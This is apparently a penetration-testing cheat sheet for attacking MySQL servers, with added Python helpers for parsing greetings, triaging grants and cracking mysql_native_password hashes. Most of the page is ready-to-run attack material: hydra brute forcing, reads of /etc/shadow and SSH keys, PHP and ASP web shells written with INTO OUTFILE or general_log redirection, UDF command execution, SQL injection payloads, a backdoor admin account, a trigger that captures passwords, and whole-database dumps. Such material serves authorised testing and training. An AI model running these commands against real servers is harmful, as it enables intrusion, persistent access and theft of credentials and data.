MySQL Database Server
Environment Variables / Setup
export IP=
export PORT=3306
export USER=root
export PASS=password
Phase 1: MySQL Service Discovery
Nmap MySQL Scripts
# Quote the glob so the shell does not expand it against local filenames
nmap --script="mysql-*" -p $PORT $IP
# mysql-info alone decodes the greeting packet (version, auth plugin, capabilities) without credentials
nmap --script=mysql-info -p $PORT $IP
Service Detection
# Check MySQL service
nmap -sV -p $PORT $IP
# Banner grabbing: mysqld sends its greeting unprompted (protocol version, server version string, auth plugin name)
nc -nv $IP $PORT
telnet $IP $PORT
# A text reply such as "Host '...' is not allowed to connect to this MySQL server" means the port is open
# but no account is granted for your source address; note it, the version still leaks in other replies
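The bytes that nc/telnet dump to the terminal are the MySQL HandshakeV10 packet, or an ERR packet when the source host has no grants. The following parser is an added example, not part of the original cheat sheet or of any MySQL tool; it decodes a constructed greeting and a constructed 1130 error packet (both built inline, not captured from a real server) into the fields a tester records: server version, connection id, capability flags (TLS offered or not), and the authentication plugin. Field layout follows the documented protocol; the sample salt bytes, connection id and version string are assumptions chosen for the example.

```python
import struct

# Capability bits from the MySQL client/server protocol (subset used here)
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SSL = 0x00000800
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000


def parse_greeting(data: bytes) -> dict:
    """Decode the first packet mysqld sends after connect: a HandshakeV10
    greeting, or an ERR packet when the client address has no grants."""
    if len(data) < 5:
        raise ValueError("packet too short")
    length = int.from_bytes(data[:3], "little")   # 3-byte payload length, then 1 sequence byte
    payload = data[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated payload")
    if payload[0] == 0xFF:                        # ERR packet: no SQLSTATE marker before auth
        return {"error": int.from_bytes(payload[1:3], "little"),
                "message": payload[3:].decode("utf-8", "replace")}
    if payload[0] != 0x0A:
        raise ValueError("unsupported handshake protocol version %d" % payload[0])
    pos = 1
    end = payload.index(b"\x00", pos)
    version = payload[pos:end].decode("ascii", "replace")   # NUL-terminated server version
    pos = end + 1
    conn_id = int.from_bytes(payload[pos:pos + 4], "little")
    pos += 4
    salt = payload[pos:pos + 8]                   # auth-plugin-data part 1
    pos += 9                                      # plus one filler byte
    cap_low = int.from_bytes(payload[pos:pos + 2], "little")
    pos += 2
    charset = payload[pos]
    pos += 1
    status = int.from_bytes(payload[pos:pos + 2], "little")
    pos += 2
    cap_high = int.from_bytes(payload[pos:pos + 2], "little")
    pos += 2
    caps = cap_low | (cap_high << 16)
    auth_len = payload[pos]                       # total auth-plugin-data length
    pos += 11                                     # plus 10 reserved bytes
    if caps & CLIENT_SECURE_CONNECTION:
        part2 = max(13, auth_len - 8)             # part 2 is NUL padded/terminated
        salt += payload[pos:pos + part2].rstrip(b"\x00")
        pos += part2
    plugin = None
    if caps & CLIENT_PLUGIN_AUTH:
        end = payload.index(b"\x00", pos)
        plugin = payload[pos:end].decode("ascii", "replace")
    return {"version": version, "connection_id": conn_id, "salt": salt,
            "capabilities": caps, "charset": charset, "status": status,
            "ssl": bool(caps & CLIENT_SSL), "auth_plugin": plugin}


def summarize(info: dict) -> list:
    """Turn a parsed greeting into the notes a tester writes down."""
    if "error" in info:
        return ["error %d: %s" % (info["error"], info["message"])]
    notes = ["server version %s (connection id %d)" % (info["version"], info["connection_id"])]
    notes.append("TLS offered" if info["ssl"] else "no TLS: queries and results cross in clear")
    if info["auth_plugin"] == "mysql_native_password":
        notes.append("mysql_native_password: SHA1-based, hydra/hashcat friendly")
    elif info["auth_plugin"]:
        notes.append("auth plugin %s" % info["auth_plugin"])
    return notes


def _frame(payload: bytes, seq: int = 0) -> bytes:
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


def build_sample_greeting(version=b"8.0.36", conn_id=42, plugin=b"caching_sha2_password",
                          caps=CLIENT_PROTOCOL_41 | CLIENT_SSL | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH):
    """Constructed HandshakeV10 packet for offline use; not a capture from a real server."""
    salt = bytes(range(1, 21))                    # 20 fixed bytes standing in for the random nonce
    p = bytes([0x0A]) + version + b"\x00"
    p += struct.pack("<I", conn_id) + salt[:8] + b"\x00"
    p += struct.pack("<H", caps & 0xFFFF) + bytes([0xFF]) + struct.pack("<H", 0x0002)
    p += struct.pack("<H", caps >> 16) + bytes([21]) + b"\x00" * 10
    p += salt[8:] + b"\x00" + plugin + b"\x00"
    return _frame(p)


# Constructed ERR packet of the kind mysqld sends when no account matches the source host
SAMPLE_ERR = _frame(b"\xff" + struct.pack("<H", 1130)
                    + b"Host '10.0.0.5' is not allowed to connect to this MySQL server")

if __name__ == "__main__":
    for pkt in (build_sample_greeting(), SAMPLE_ERR):
        print(summarize(parse_greeting(pkt)))
```

Feed it the raw bytes read from the socket (the first packet only) and the same parser covers both outcomes of a banner grab; the 1130 case is the one worth keeping in the report, since it proves the service is reachable even though no login will succeed from that address.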
Phase 2: Authentication Testing
Anonymous Access Testing
# Without -p the client sends an empty password, which tests for passwordless accounts
mysql -h $IP -u root
mysql -h $IP -u admin
# An empty username tests for the anonymous account (''@'localhost' / ''@'%')
mysql -h $IP -u ''
Default Credentials Testing
# Common MySQL default credentials
# -p'' collapses to a bare -p in the shell and prompts interactively; use --password= to send an empty password
mysql -h $IP -u root --password=
mysql -h $IP -u root -proot
mysql -h $IP -u root -padmin
mysql -h $IP -u root -ppassword
mysql -h $IP -u admin -padmin
mysql -h $IP -u admin -ppassword
mysql -h $IP -u user -puser
Password Brute Force
# Using hydra (-s for a non-default port, -t to keep the thread count low against small servers)
hydra -s $PORT -t 4 -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt $IP mysql
# Using nmap
nmap --script mysql-brute --script-args userdb=/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt,passdb=/usr/share/wordlists/rockyou.txt -p $PORT $IP
Phase 3: MySQL Enumeration
Basic Information Gathering
# Connect to MySQL
mysql -h $IP -u $USER -p$PASS
# Basic enumeration (inside the mysql client)
SELECT version();
# user() is the account you logged in as; current_user() is the grant entry that actually matched
SELECT user();
SELECT current_user();
# database() is NULL and SHOW tables fails with "No database selected" until USE <db>
SELECT database();
SHOW databases;
SHOW tables;
# mysql.user needs SELECT on the mysql schema; the hash column is password (MySQL <= 5.6, MariaDB)
# or authentication_string (MySQL 5.7+)
SELECT host, user, password FROM mysql.user;
SELECT host, user, authentication_string, plugin FROM mysql.user;
Database and Table Enumeration
# List all databases
SHOW databases;
# Use specific database
USE database_name;
# List tables in current database
SHOW tables;
# Describe table structure
DESCRIBE table_name;
# Show table contents
SELECT * FROM table_name;
User and Privilege Enumeration
# Show current user privileges
SHOW GRANTS;
SHOW GRANTS FOR CURRENT_USER();
# List all users (password column on MySQL <= 5.6 / MariaDB, authentication_string on 5.7+)
SELECT user, host, password FROM mysql.user;
SELECT user, host, authentication_string, plugin FROM mysql.user;
# FILE and SUPER are global privileges, stored only in mysql.user (column names are case-insensitive)
SELECT user, host FROM mysql.user WHERE File_priv='Y';
SELECT user, host FROM mysql.user WHERE Super_priv='Y';
# Without access to the mysql schema, look for FILE, SUPER or ALL PRIVILEGES in the ON *.* line of SHOW GRANTS
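SHOW GRANTS output is easy to skim for one account and tedious for fifty. The following triage script is an added example, not part of the original page or of any MySQL tooling; it parses GRANT statements in both the 5.x ('user'@'host') and 8.x (`user`@`host`) quoting styles and reports the privileges the rest of this page depends on (FILE, SUPER, ALL PRIVILEGES, WITH GRANT OPTION). The four sample grant lines are constructed for the example, not dumped from a real server; the account names and the SYSTEM_VARIABLES_ADMIN entry (the 8.0 dynamic privilege that also allows SET GLOBAL) are assumptions made to show the parser handling them.

```python
import re

# Accepts both the 5.x ('user'@'host') and 8.x (`user`@`host`) quoting styles of SHOW GRANTS
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
    r"(?P<user>['`][^'`]*['`]@['`][^'`]*['`])(?P<rest>.*)$",
    re.IGNORECASE,
)

# Global privileges that change what an attacker can do with the account
GLOBAL_FLAGS = {
    "ALL PRIVILEGES": "full DBA rights (includes FILE, SUPER, CREATE USER)",
    "FILE": "LOAD_FILE()/INTO OUTFILE on the server, limited only by secure_file_priv",
    "SUPER": "SET GLOBAL (general_log redirection), KILL of other sessions",
    "SYSTEM_VARIABLES_ADMIN": "SET GLOBAL without SUPER (8.0 dynamic privilege)",
    "CREATE USER": "can add accounts for persistence",
}


def parse_grant(line: str):
    """Split one GRANT line into user, scope, privilege set and grant-option flag."""
    m = GRANT_RE.match(line.strip().rstrip(";"))
    if not m:
        return None
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    if "ALL" in privs:                      # some servers print ALL instead of ALL PRIVILEGES
        privs.discard("ALL")
        privs.add("ALL PRIVILEGES")
    return {
        "user": m.group("user").replace("`", "'"),
        "scope": m.group("scope"),
        "privs": privs,
        "grant_option": "GRANT OPTION" in m.group("rest").upper(),
    }


def triage_grants(lines) -> dict:
    """Map each account to the findings worth acting on. FILE and SUPER are global
    privileges, so they only ever appear in the ON *.* line."""
    findings = {}
    for line in lines:
        g = parse_grant(line)
        if g is None:
            continue
        out = findings.setdefault(g["user"], [])
        if g["scope"] == "*.*":
            for priv, why in GLOBAL_FLAGS.items():
                if priv in g["privs"]:
                    out.append("%s: %s" % (priv, why))
        if g["grant_option"]:
            out.append("WITH GRANT OPTION on %s: can hand privileges to new accounts" % g["scope"])
    return findings


# Constructed SHOW GRANTS output for three accounts (not from a real server)
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO `app`@`%`",
    "GRANT SELECT, INSERT, UPDATE ON `shop`.* TO `app`@`%`",
    "GRANT FILE, SUPER ON *.* TO 'report'@'10.0.0.%'",
    "GRANT ALL PRIVILEGES ON *.* TO `backup`@`localhost` WITH GRANT OPTION",
]

if __name__ == "__main__":
    for user, notes in triage_grants(SAMPLE_GRANTS).items():
        print(user, notes or ["nothing notable"])
```

Pipe `mysql -B -N -e "SHOW GRANTS FOR 'x'@'y'"` output for each account into `triage_grants`; an account whose only global line is `GRANT USAGE ON *.*` has no server-level power, whatever it can do inside its own schema.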
Phase 4: MySQL Exploitation
File Operations (If FILE Privilege)
# LOAD_FILE() returns NULL rather than an error when the file is unreadable by the mysqld OS user,
# larger than max_allowed_packet, or outside secure_file_priv
SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('/etc/shadow');
SELECT LOAD_FILE('/var/www/html/config.php');
# Check the restriction before writing: '' = anywhere, NULL = disabled, a directory = only inside it
SHOW VARIABLES LIKE 'secure_file_priv';
# Write files: INTO OUTFILE refuses to overwrite an existing file, and the directory must be writable by the mysqld OS user
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
Web Shell Creation
# Create PHP web shell (Linux/Apache docroot; confirm the path from vhost or config files read with LOAD_FILE)
SELECT '<?php echo system($_REQUEST["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
# Create ASP web shell (Windows/IIS targets: write into the IIS wwwroot, forward slashes are accepted)
SELECT '<% eval request("cmd") %>' INTO OUTFILE 'C:/inetpub/wwwroot/shell.asp';
# Test web shell (quote the URL so the shell does not interpret ? and &)
curl "http://$IP/shell.php?cmd=whoami"
UDF (User Defined Function) Exploitation
# Check for UDF capability: already registered functions, and the directory mysqld loads shared libraries from
SELECT * FROM mysql.func;
SHOW VARIABLES LIKE 'plugin_dir';
# Requirements: FILE privilege, secure_file_priv empty or covering plugin_dir, INSERT on mysql.func
# (needed for CREATE FUNCTION ... SONAME), and a library built for the server's OS and architecture
# (sqlmap ships lib_mysqludf_sys builds for Linux and Windows, 32- and 64-bit)
# Drop the library with SELECT ... INTO DUMPFILE (binary-safe, unlike INTO OUTFILE) into plugin_dir, then:
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
# Metasploit exploit/multi/mysql/mysql_udf_payload automates the same steps
SQL Injection (If Web App Uses MySQL)
# MySQL only treats -- as a comment when whitespace follows it; "-- -" survives URL trimming, or use #
' OR 1=1-- -
" OR 1=1-- -
' OR 1=1#
# UNION payloads must match the original column count: raise ORDER BY n until the query errors
' ORDER BY 3-- -
' UNION SELECT 1,2,3-- -
' UNION SELECT user(),database(),version()-- -
# Extract data (pad with literals to keep the column count)
' UNION SELECT username,password,3 FROM users-- -
' UNION SELECT LOAD_FILE('/etc/passwd'),2,3-- -
Phase 5: Database Content Analysis
Sensitive Data Hunting
# Look for password tables in the current database only
SHOW tables LIKE '%pass%';
SHOW tables LIKE '%user%';
SHOW tables LIKE '%admin%';
# Search every database at once via information_schema (skip the system schemas)
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE column_name LIKE '%pass%' AND table_schema NOT IN ('mysql','information_schema','performance_schema','sys');
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE column_name LIKE '%email%' AND table_schema NOT IN ('mysql','information_schema','performance_schema','sys');
# Extract user credentials (table and column names are placeholders; use what the queries above return)
SELECT username, password FROM users;
SELECT email, password FROM accounts;
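Application tables hold whatever hash the application chose, but the mysql.user rows dumped in the enumeration phase have a known format: a mysql_native_password entry is `*` followed by uppercase hex of SHA1(SHA1(password)), an empty authentication_string means no password at all, and a caching_sha2_password entry (`$A$005$...`) needs hashcat rather than a quick script. The code below is an added example, not part of the original page; it recomputes the native hash, classifies each row, and checks a small wordlist against constructed rows (the usernames, hosts and the caching_sha2 placeholder string are assumptions, and the hashes are computed by the function itself rather than copied from a real server). It also serves the password-reuse step under Next Steps: a recovered database password is what you try against SSH and the web application.

```python
import hashlib


def mysql_native_password(password: str) -> str:
    """The mysql_native_password hash stored in mysql.user:
    '*' followed by uppercase hex of SHA1(SHA1(password))."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def classify_auth_string(auth: str) -> str:
    """Name the hash format of one authentication_string / password column value."""
    if auth == "":
        return "empty"                          # account logs in without a password
    if auth.startswith("*") and len(auth) == 41:
        return "mysql_native_password"          # hashcat -m 300
    if auth.startswith("$A$"):
        return "caching_sha2_password"          # hashcat -m 7401, not handled here
    if len(auth) == 16:
        return "old_password"                   # pre-4.1 format, hashcat -m 200
    return "unknown"


def crack_user_rows(rows, wordlist) -> dict:
    """rows: (user, host, authentication_string) tuples as dumped from mysql.user.
    Returns {(user, host): password} with '' for empty auth strings and
    None when nothing in the wordlist matched or the format is unsupported."""
    table = {mysql_native_password(w): w for w in wordlist}   # hash once, look up many
    results = {}
    for user, host, auth in rows:
        kind = classify_auth_string(auth)
        if kind == "empty":
            results[(user, host)] = ""
        elif kind == "mysql_native_password":
            results[(user, host)] = table.get(auth.upper())
        else:
            results[(user, host)] = None
    return results


# Constructed rows; the native hashes come from mysql_native_password() above, not from a live server
SAMPLE_ROWS = [
    ("root", "localhost", "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"),   # hash of 'password'
    ("app", "%", mysql_native_password("Summer2024!")),
    ("legacy", "10.0.0.%", ""),
    ("svc", "%", "$A$005$" + "0" * 63),                                   # shape of a caching_sha2 entry only
]
SAMPLE_WORDLIST = ["123456", "password", "admin", "Summer2024!"]

if __name__ == "__main__":
    for (user, host), pw in crack_user_rows(SAMPLE_ROWS, SAMPLE_WORDLIST).items():
        print("%s@%s -> %r" % (user, host, pw))
```

For anything beyond a short list of candidates, hand the 41-character strings to hashcat; the point of the script is the format check, which tells you immediately which rows are worth the effort and which ones log in with no password at all.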
Configuration Analysis
# Check MySQL configuration
SHOW variables;
# secure_file_priv: '' = file operations anywhere, NULL = disabled, a directory = restricted to it
SHOW variables LIKE 'secure_file_priv';
SHOW variables LIKE 'version%';
# Check for dangerous settings
# log_bin_trust_function_creators ON lets non-SUPER accounts create stored functions and triggers when binary logging is on
SHOW variables LIKE 'log_bin_trust_function_creators';
# general_log ON writes every statement (plaintext credentials included) to general_log_file, the target of the log-file trick below
SHOW variables LIKE 'general_log%';
# Where UDF libraries would have to land
SHOW variables LIKE 'plugin_dir';
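The three values of secure_file_priv are easy to misread (an empty string is the weak setting, NULL is the locked-down one, and a directory confines both reads and writes to that tree), and whether a UDF drop is even possible depends on plugin_dir falling inside it. The script below is an added example, not part of the original page or of MySQL itself: it parses the tab-separated output of `mysql -B -e "SHOW VARIABLES"`, answers "would this path be allowed?" with path normalisation so `..` tricks do not fool the check, and assesses a weak sample configuration beside a hardened one. Both variable dumps are constructed for the example; the paths in them are assumptions.

```python
import posixpath


def parse_show_variables(text: str) -> dict:
    """Parse tab-separated Variable_name/Value lines as printed by mysql -B."""
    result = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("Variable_name"):
            continue
        name, _, value = line.partition("\t")
        result[name] = value
    return result


def file_op_allowed(secure_file_priv, path: str) -> bool:
    """Does secure_file_priv permit LOAD_FILE()/INTO OUTFILE/INTO DUMPFILE on path?
    None or the text NULL: file operations disabled; '': unrestricted;
    a directory: only paths inside it (after normalisation, so /dir/../etc fails)."""
    if secure_file_priv is None or secure_file_priv == "NULL":
        return False
    if secure_file_priv == "":
        return True
    base = posixpath.normpath(secure_file_priv)
    target = posixpath.normpath(path)
    return target == base or target.startswith(base + "/")


def assess_config(variables: dict) -> list:
    """Return the findings a tester would note for the variables this page checks."""
    notes = []
    sfp = variables.get("secure_file_priv")
    if sfp == "":
        notes.append("secure_file_priv empty: LOAD_FILE/INTO OUTFILE anywhere the mysqld OS user can read or write")
    elif sfp in (None, "NULL"):
        notes.append("secure_file_priv NULL: server-side file operations disabled")
    else:
        notes.append("secure_file_priv=%s: file operations confined to that directory" % sfp)
    plugin_dir = variables.get("plugin_dir")
    if plugin_dir:
        state = "possible" if file_op_allowed(sfp, plugin_dir) else "blocked by secure_file_priv"
        notes.append("UDF drop into plugin_dir %s: %s" % (plugin_dir, state))
    if variables.get("general_log") == "ON":
        notes.append("general_log ON -> %s: every statement, credentials included, is written there"
                     % variables.get("general_log_file", "?"))
    if variables.get("log_bin_trust_function_creators") == "ON":
        notes.append("log_bin_trust_function_creators ON: non-SUPER accounts can create stored functions/triggers")
    return notes


# Constructed SHOW VARIABLES excerpts (not from a real server): a weak box and a hardened one
WEAK_VARIABLES = """\
Variable_name\tValue
general_log\tON
general_log_file\t/var/www/html/shell.php
log_bin_trust_function_creators\tON
plugin_dir\t/usr/lib/mysql/plugin/
secure_file_priv\t
version\t5.7.44
"""
HARDENED_VARIABLES = """\
Variable_name\tValue
general_log\tOFF
general_log_file\t/var/lib/mysql/host.log
log_bin_trust_function_creators\tOFF
plugin_dir\t/usr/lib/mysql/plugin/
secure_file_priv\t/var/lib/mysql-files/
version\t8.0.36
"""

if __name__ == "__main__":
    for label, dump in (("weak", WEAK_VARIABLES), ("hardened", HARDENED_VARIABLES)):
        print(label)
        for note in assess_config(parse_show_variables(dump)):
            print("  -", note)
```

The hardened dump is what `secure_file_priv=/var/lib/mysql-files` in my.cnf produces: INTO OUTFILE still works for legitimate exports into that directory, while the web root and plugin_dir are out of reach even for an account holding FILE.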
Phase 6: Privilege Escalation via MySQL
Running as Root User
# Check if MySQL runs as root
# user() returns the database account, not the OS user; and \! runs commands on the client machine, not the server
SELECT user();
# From any shell on the server (for example the web shell written above), check the mysqld process owner
ps -o user= -C mysqld
# Without a shell: LOAD_FILE returning content for a root-only file means mysqld has elevated file access
SELECT LOAD_FILE('/etc/shadow');
# If running as root, file operations have elevated privileges
SELECT LOAD_FILE('/root/.ssh/id_rsa');
Log File Manipulation (requires SUPER, or SYSTEM_VARIABLES_ADMIN on MySQL 8.0)
# Note the current settings so they can be restored afterwards
SHOW VARIABLES LIKE 'general_log%';
# Point the general log at the web root (directory must be writable by the mysqld OS user and permitted by AppArmor/SELinux)
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SET GLOBAL general_log = 'ON';
# Execute a query so its text lands in the log; the surrounding log lines are harmless because PHP only executes what is inside <?php ?>
SELECT '<?php system($_GET["cmd"]); ?>';
# Disable logging, then set general_log_file back to the value noted above
SET GLOBAL general_log = 'OFF';
Phase 7: Post-Exploitation
Persistence via MySQL
# Create backdoor user (needs CREATE USER; FLUSH PRIVILEGES is only required when the mysql.* tables are edited directly)
CREATE USER 'backdoor'@'%' IDENTIFIED BY 'password123';
GRANT ALL PRIVILEGES ON *.* TO 'backdoor'@'%' WITH GRANT OPTION;
FLUSH PRIVILEGES;
# Create trigger for persistence (needs the TRIGGER privilege on the table; the capture table must exist first)
CREATE TABLE backdoor_table (username VARCHAR(255), password VARCHAR(255));
CREATE TRIGGER backdoor_trigger BEFORE INSERT ON users FOR EACH ROW INSERT INTO backdoor_table VALUES (NEW.username, NEW.password);
Data Exfiltration
# Export database contents (a password on the command line is visible in the process list; prompt with -p or use ~/.my.cnf when it matters)
mysqldump -h $IP -u $USER -p$PASS --single-transaction database_name > dump.sql
# Export specific tables
mysqldump -h $IP -u $USER -p$PASS database_name table_name > table_dump.sql
# Export everything the account can see
mysqldump -h $IP -u $USER -p$PASS --all-databases > all.sql
# Export to CSV: INTO OUTFILE writes on the server's filesystem (FILE privilege, secure_file_priv), so the file still has to be retrieved
SELECT * FROM users INTO OUTFILE '/tmp/users.csv' FIELDS TERMINATED BY ',' ENCLOSED BY '"' LINES TERMINATED BY '\n';
# Client-side alternative that needs no FILE privilege (tab-separated)
mysql -h $IP -u $USER -p$PASS -B -e "SELECT * FROM database_name.users" > users.tsv
MySQL Security Misconfigurations
Common Issues to Check
- Default or empty credentials (root with no password, the anonymous ''@'%' account)
- FILE privilege granted to non-admin users
- secure_file_priv empty (file operations anywhere mysqld can read or write); NULL means disabled, not unrestricted
- mysqld running as root, so file reads and writes inherit root access
- SUPER (or SYSTEM_VARIABLES_ADMIN) held by application accounts, enabling the general_log redirection
- general_log_file pointing somewhere the web server executes
- Weak user passwords, and reuse of database passwords for OS or web accounts
- Overly permissive grants (ALL PRIVILEGES ON *.*, WITH GRANT OPTION, accounts allowed from '%')
MySQL Enumeration Checklist
- Anonymous access testing
- Default credentials testing
- User enumeration and privilege checking
- Database and table discovery
- File read/write capability testing
- Web shell creation (if web server present)
- UDF exploitation potential
- Sensitive data extraction
- Configuration analysis
Tools Summary
# Enumeration
nmap mysql scripts (mysql-info, mysql-enum, mysql-users), mysql client
# Exploitation
mysql client, mysqldump, sqlmap (SQL injection; bundles lib_mysqludf_sys), Metasploit mysql_udf_payload
# Brute force / hash cracking
hydra, nmap mysql-brute, hashcat (-m 300 mysql_native_password, -m 7401 caching_sha2_password)
Common MySQL Ports
3306/tcp - MySQL classic protocol (default)
33060/tcp - MySQL X Protocol (mysqlx plugin, 5.7.12+ and 8.0)
3307/tcp - common choice for a second instance; not a reserved port, so scan for the greeting rather than assuming
Next Steps
Once MySQL access is gained:
- Extract sensitive data from databases
- Attempt file operations for web shell creation
- Check for password reuse across other services
- Analyze application code if database credentials found
- Escalate privileges if MySQL runs as root